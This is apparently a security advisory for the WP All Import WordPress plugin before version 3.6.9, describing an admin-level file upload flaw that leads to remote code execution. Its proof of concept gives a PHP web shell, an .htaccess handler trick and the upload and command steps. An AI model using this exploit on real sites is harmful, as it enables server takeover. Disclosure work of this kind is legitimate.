WordPress Plugin Vulnerabilities
WP All Import < 3.6.9 - Admin+ Arbitrary File Upload to RCE
Description
The plugin is not properly filtering which file extensions are allowed to be imported on the server, which could allow administrators in multi-site WordPress installations to upload arbitrary files
Proof of Concept
[1] Create 'poc.zip' with 2 files like below [1-1] 'exploit.php.txt' is as follows. ---------------------------------- <?php system($_GET['cmd']); ?> ---------------------------------- [1-2] '.htaccess' is as follows. ---------------------------------- <IfModule mod_rewrite.c> AddHandler application/x-httpd-php .php .html </IfModule> ---------------------------------- [2] Upload the 'poc.zip' via the button [Upload a file] on 'http://localhost/wp-admin/admin.php?page=pmxi-admin-import' [3] Access 'http://localhost/wp-content/uploads/wpallimport/uploads/fa5b307edb3ccdd2244b2b60b1d9c0ee/exploit.php.txt?cmd=id' in order to execute arbitrary commands. * fa5b307edb3ccdd2244b2b60b1d9c0ee is a random string from the server response.
Affects Plugins
Fixed in version 3.6.9
References
Classification
Miscellaneous
Timeline
Publicly Published
2022-10-14 (about 3 months ago)
Added
2022-10-15 (about 3 months ago)
Last Updated
2022-10-17 (about 3 months ago)